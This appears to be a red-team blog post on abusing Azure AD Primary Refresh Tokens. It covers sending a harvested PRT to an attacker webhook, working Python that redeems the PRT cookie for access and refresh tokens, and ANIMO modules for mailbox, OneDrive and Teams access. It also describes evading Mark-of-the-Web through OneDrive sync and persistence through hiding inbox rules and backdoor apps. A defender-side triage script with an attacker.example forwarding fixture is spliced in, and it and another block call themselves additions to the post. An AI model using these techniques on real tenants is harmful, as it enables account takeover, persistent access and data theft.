PRT Tokens: From Initial Access to Long-Term Cloud Control

  • dgarcia966
  • Jan 21
  • 4 min read

Primary Refresh Tokens (PRTs) sit at the core of Azure AD (now Microsoft Entra ID) authentication, quietly enabling seamless single sign-on across cloud and hybrid environments.

While commonly treated as an implementation detail, PRTs are a powerful attack primitive. Once obtained, they can keep an adversary authenticated long after the initial compromise, potentially surviving password resets, MFA challenges, and user logouts.


This post explores how PRTs can be abused to move from initial access to durable, long-term control of Azure AD-backed resources.


We will examine where PRTs live, how they are issued and refreshed, and why traditional remediation steps frequently fail to invalidate them, which makes PRT abuse one of the most effective persistence techniques in modern cloud environments.


Initial Access

In today's environments, red teamers achieve initial access through many methods; to name a few:

  • ClickFix

  • ConsentFix

  • SpearPhishing (Attachments)

  • SpearPhishing (Links)


EDRs and AVs are increasingly attuned to the last two scenarios, and email filters have become an additional hurdle to evade, so simply getting the email to the intended recipient is a challenge in itself. Across all of these techniques, the primary goal is usually command execution: a loader that connects back to our C2 server, establishes communication, and maintains control.


Actions that stop short of a loader, such as executing a single command, writing a file, or querying information, are often considered "harmless" and are not blocked by AV/EDR. So instead of dropping a loader, why not use that same execution to request a token in the context of the current user? In this scenario we need neither further user interaction nor an interactive SSO prompt: we can request a PRT directly.


Requesting the Token

To request the PRT, we used the AADInternals PowerShell module. We modified the relevant script so that it no longer depends on functions tied to the rest of the AADInternals module, and added a new parameter, "webhook", which sends the obtained token to a remote host we control. With these changes the script can be run stand-alone to request a token and ship it out.


Python script that handles PRT Requests

The PRT can be exchanged for a valid access token and refresh token from ANIMO's "Tokens and Credential Attacks" menu. With those tokens, ANIMO's modules can be used to gain deeper access to the target environment.


ANIMO PRT Token to Access Token module
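Worked example of the exchange step above. This is an added illustration for this post, not ANIMO or AADInternals code: it builds the authorize request that presents the PRT cookie, extracts the authorization code from the redirect, builds the token redemption, and decodes the resulting access token to show which user, client ID, resource and scopes it covers. The v1 endpoints and the x-ms-RefreshTokenCredential cookie name are those used by public PRT tooling; the tenant ID, client ID, user and token contents in the sample are constructed, and the network round trips are only sketched in the `__main__` block so the rest runs offline.

```python
"""PRT cookie -> authorization code -> access token, then inspect what it grants.
Added example for this post; it is not ANIMO or AADInternals code."""
import base64
import json
import time
import urllib.parse
import urllib.request

# Azure AD v1 endpoints used by the public PRT-cookie tooling this post builds on.
AUTHORIZE_URL = "https://login.microsoftonline.com/common/oauth2/authorize"
TOKEN_URL = "https://login.microsoftonline.com/common/oauth2/token"
PRT_COOKIE_NAME = "x-ms-RefreshTokenCredential"  # cookie carrying the PRT-derived JWT


def build_authorize_request(prt_cookie, client_id, redirect_uri, resource):
    """GET to the authorize endpoint with the PRT cookie attached. The cookie is a
    short-lived JWT signed with the device session key and embeds a server nonce,
    so it must be used soon after the script obtains it."""
    query = urllib.parse.urlencode({"client_id": client_id, "response_type": "code",
                                    "redirect_uri": redirect_uri, "resource": resource})
    return urllib.request.Request(f"{AUTHORIZE_URL}?{query}",
                                  headers={"Cookie": f"{PRT_COOKIE_NAME}={prt_cookie}"})


def parse_redirect(location):
    """A valid cookie yields a 302 to redirect_uri with ?code=...; a rejected one
    redirects with ?error=...&error_description=... instead. Do not let the HTTP
    client follow the redirect, or the code is lost."""
    qs = urllib.parse.parse_qs(urllib.parse.urlsplit(location).query)
    if "code" in qs:
        return {"code": qs["code"][0]}
    return {"error": qs.get("error", ["unknown"])[0],
            "description": qs.get("error_description", [""])[0]}


def build_token_request(code, client_id, redirect_uri, resource):
    """Standard authorization-code redemption. The JSON reply carries access_token,
    refresh_token and expires_in; the refresh token is what a tool keeps reusing."""
    body = urllib.parse.urlencode({"grant_type": "authorization_code", "client_id": client_id,
                                   "code": code, "redirect_uri": redirect_uri,
                                   "resource": resource}).encode()
    return urllib.request.Request(TOKEN_URL, data=body,
                                  headers={"Content-Type": "application/x-www-form-urlencoded"})


def decode_claims(jwt):
    """Payload claims of a compact JWS, read without signature verification: we are
    the bearer, not the resource server that must verify it."""
    parts = jwt.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS")
    return json.loads(base64.urlsafe_b64decode(parts[1] + "=" * (-len(parts[1]) % 4)))


def summarize(access_token, now=None):
    """What the token actually grants: who, which client, which resource and scopes,
    and for how long. Check this before pointing a module at it."""
    c = decode_claims(access_token)
    now = int(time.time()) if now is None else int(now)
    return {"user": c.get("upn") or c.get("unique_name"), "tenant": c.get("tid"),
            "client_id": c.get("appid"), "resource": c.get("aud"),
            "scopes": set(c.get("scp", "").split()), "auth_methods": list(c.get("amr", [])),
            "seconds_left": max(0, int(c.get("exp", 0)) - now)}


def _b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


# Constructed sample token so summarize() can be exercised offline. Tenant and
# client ids are placeholders; the signature segment is a dummy (real tokens are
# RS256-signed by Microsoft).
SAMPLE_NOW = 1_700_000_000
SAMPLE_TOKEN = ".".join([
    _b64url(b'{"alg":"RS256","typ":"JWT"}'),
    _b64url(json.dumps({"aud": "https://graph.microsoft.com",
                        "tid": "11111111-2222-3333-4444-555555555555",
                        "appid": "00000000-0000-0000-0000-00000000abcd",
                        "upn": "j.doe@contoso.example", "amr": ["pwd", "mfa"],
                        "scp": "Mail.ReadWrite Mail.Send Files.ReadWrite.All User.Read",
                        "iat": SAMPLE_NOW - 60, "exp": SAMPLE_NOW + 3600}).encode()),
    _b64url(b"dummy-signature"),
])

if __name__ == "__main__":
    # Network step, sketched: send build_authorize_request() with redirects disabled,
    # feed the Location header to parse_redirect(), then POST build_token_request().
    print(parse_redirect("https://localhost/?code=0.AAAAconstructedcode"))
    print(parse_redirect("https://localhost/?error=invalid_grant&error_description=AADSTS%20constructed"))
    print(summarize(SAMPLE_TOKEN, SAMPLE_NOW))
```

The `aud` and `scp` claims are what decide which module a token can drive; a token scoped to Graph mail permissions will not reach SharePoint content, and a new authorize/token round trip with the PRT cookie, using a different client ID or resource, is what produces one that does.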

Let's look at the impact of a PRT. In the following example, the token gives the attacker access to the user's mailbox.


ANIMO Outlook module

With this access, the operator can send, reply to and delete emails and download attachments. It also illustrates that a PRT can be used to request fresh access tokens for different client IDs. Next is SharePoint/OneDrive access. This uses the same access token as the Outlook module: ANIMO reuses tokens it already knows and has saved across its modules.


ANIMO OneDrive/SharePoint module

As this shows, the token also gives us a path onto the user's workstation. For context, a OneDrive-linked workstation stores files in the cloud and syncs them down to the user's local machine. One consequence is that the synced files sit in a Trusted Location: content that arrives this way does not carry the Zone.Identifier alternate data stream (Mark-of-the-Web), so a binary or script executed from there does not trigger the warnings that would normally flag a downloaded file. ANIMO can upload and download these files.


Local File Uploaded to Users Workstation via OneDrive linkage

ANIMO can also query Teams chats, giving insight into the user's conversations.


ANIMO Team Chat module

ANIMO offers many features; which ones an operator can use depends on the access token and its scope. With these tokens the operator can also run enumeration from the Sessions tab, which becomes active once an access token or credentials are added to ANIMO. This integration uses the same PowerShell modules as a regular terminal session.


PowerShell Enumeration via ANIMO

A PRT supports persistence ranging from fileless methods to C2 malware, depending on the PRT and on the scopes available for the client ID we used. A straightforward example of fileless persistence aimed at data exfiltration is an Outlook inbox rule, which lets us dictate where a copy of an email goes once certain conditions are met.


Outlook Rules

As shown above, we created rules with specific conditions; once a condition is matched, the rule fires. In this example, matching emails are moved to Deleted Items.
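Defender-side check for this technique, added here and not part of the original post or of ANIMO: rule changes land in the Microsoft 365 Unified Audit Log as New-InboxRule and Set-InboxRule records with a Parameters array, and the triage below flags forwarding to an external domain, moving mail to Deleted Items or similar out-of-sight folders, keyword filters on sensitive terms, and one-character rule names. The audit records, the folder and keyword lists and the scoring rule are this example's own assumptions.

```python
"""Triage inbox-rule changes from the Microsoft 365 Unified Audit Log for the
exfiltration / evidence-hiding pattern. Added example for this post, not ANIMO
code. Keyword and folder lists and the scoring are this example's assumptions."""
import json

RULE_OPERATIONS = {"New-InboxRule", "Set-InboxRule"}
FORWARDING_PARAMS = ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo")
KEYWORD_PARAMS = ("SubjectContainsWords", "BodyContainsWords", "SubjectOrBodyContainsWords")
# Folders where an attacker parks mail the victim is unlikely to browse.
HIDING_FOLDERS = {"deleted items", "rss feeds", "rss subscriptions", "archive",
                  "junk email", "conversation history"}
# Filter words typical of rules that hunt for credentials, payments or alerts.
SENSITIVE_WORDS = {"password", "invoice", "payment", "wire", "mfa", "security", "phish"}


def _params(record):
    """Flatten the UAL Parameters array [{Name, Value}, ...] into a dict of strings."""
    return {p["Name"]: str(p["Value"]) for p in record.get("Parameters", [])}


def _domain(address):
    """Domain of 'user@x.y' or the UAL-style '[SMTP:user@x.y]'."""
    if "@" not in address:
        return ""
    return address.rsplit("@", 1)[1].strip("]> ").lower()


def assess_inbox_rule(record):
    """Return None for non-rule events, otherwise a verdict with its reasons."""
    if record.get("Operation") not in RULE_OPERATIONS:
        return None
    params = _params(record)
    actor_domain = _domain(record.get("UserId", ""))
    reasons, external, hiding, keywords = [], False, False, False

    for name in FORWARDING_PARAMS:
        for target in params.get(name, "").split(";"):
            if _domain(target) and _domain(target) != actor_domain:
                external = True
                reasons.append(f"{name} to external address {target.strip()}")

    folder = params.get("MoveToFolder", "").strip().lower()
    if params.get("DeleteMessage", "").lower() == "true" or folder in HIDING_FOLDERS:
        hiding = True
        reasons.append(f"matching mail hidden ({folder or 'deleted'})")

    words = set()
    for name in KEYWORD_PARAMS:
        words |= {w.strip().lower() for w in params.get(name, "").split(";") if w.strip()}
    if words & SENSITIVE_WORDS:
        keywords = True
        reasons.append("keyword filter on " + ", ".join(sorted(words & SENSITIVE_WORDS)))

    rule_name = params.get("Name") or params.get("Identity") or ""
    terse = len(rule_name.strip()) <= 2  # rules named "." or "," are a common tell
    if terse:
        reasons.append(f"terse rule name {rule_name!r}")

    # External forwarding is suspicious on its own; hiding needs a second signal,
    # since plenty of users legitimately bin newsletters.
    return {"user": record.get("UserId"), "rule": rule_name, "operation": record["Operation"],
            "client_ip": record.get("ClientIP"), "reasons": reasons,
            "suspicious": external or (hiding and (keywords or terse))}


def triage(records):
    """Assess every record and return only the suspicious verdicts."""
    verdicts = (assess_inbox_rule(r) for r in records)
    return [v for v in verdicts if v and v["suspicious"]]


# Constructed audit records, shaped like (simplified) Search-UnifiedAuditLog output.
SAMPLE_RECORDS = [
    {"CreationTime": "2025-01-21T09:12:44", "Operation": "New-InboxRule",
     "UserId": "j.doe@contoso.example", "ClientIP": "198.51.100.23",
     "Parameters": [{"Name": "Name", "Value": "."},
                    {"Name": "SubjectOrBodyContainsWords", "Value": "invoice;payment;password"},
                    {"Name": "MoveToFolder", "Value": "Deleted Items"},
                    {"Name": "MarkAsRead", "Value": "True"},
                    {"Name": "StopProcessingRules", "Value": "True"}]},
    {"CreationTime": "2025-01-21T09:15:02", "Operation": "Set-InboxRule",
     "UserId": "j.doe@contoso.example", "ClientIP": "198.51.100.23",
     "Parameters": [{"Name": "Identity", "Value": "Project updates"},
                    {"Name": "ForwardTo", "Value": "[SMTP:collector@attacker.example]"}]},
    {"CreationTime": "2025-01-21T10:40:19", "Operation": "New-InboxRule",
     "UserId": "j.doe@contoso.example", "ClientIP": "203.0.113.8",
     "Parameters": [{"Name": "Name", "Value": "Newsletters"},
                    {"Name": "FromAddressContainsWords", "Value": "noreply@vendor.example"},
                    {"Name": "MoveToFolder", "Value": "Newsletters"}]},
    {"CreationTime": "2025-01-21T10:41:00", "Operation": "MailItemsAccessed",
     "UserId": "j.doe@contoso.example", "ClientIP": "203.0.113.8", "Parameters": []},
]

if __name__ == "__main__":
    for verdict in triage(SAMPLE_RECORDS):
        print(json.dumps(verdict, indent=2))
```

In practice the input is the AuditData JSON of each record returned by Search-UnifiedAuditLog -Operations New-InboxRule,Set-InboxRule; rules created from the Outlook desktop client are logged as UpdateInboxRules with a different parameter layout and would need a second parser. The ClientIP of the rule change is worth correlating with the IP that redeemed the token, since a PRT-derived session often creates the rule from an address the user has never signed in from.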



ANIMO provides several well-known persistence techniques in a seamless manner. Current options include Add to Group, Backdoor App, SPN Secrets, Role Assignments, and Invite Guest. These let an operator establish persistence within an Azure tenant. OPSEC ultimately depends on the operator's experience and judgment, but ANIMO provides guidance by outlining the required scopes, applicable resource URLs, and relevant considerations for each technique.


ANIMO also includes modules for external attacks, such as Password Spraying, Windows Hello Business Attack, and SPN Secret Spray. Because ANIMO is written in Python, these modules can draw directly on well-known Python libraries and techniques.



We have shown the extensive access and impact a single token can have when used effectively. From initial access to persistence and data exfiltration, these tokens give an attacker a remarkable level of control over the environment.

 
 
 

© 2025 Init1Security. All Rights Reserved.
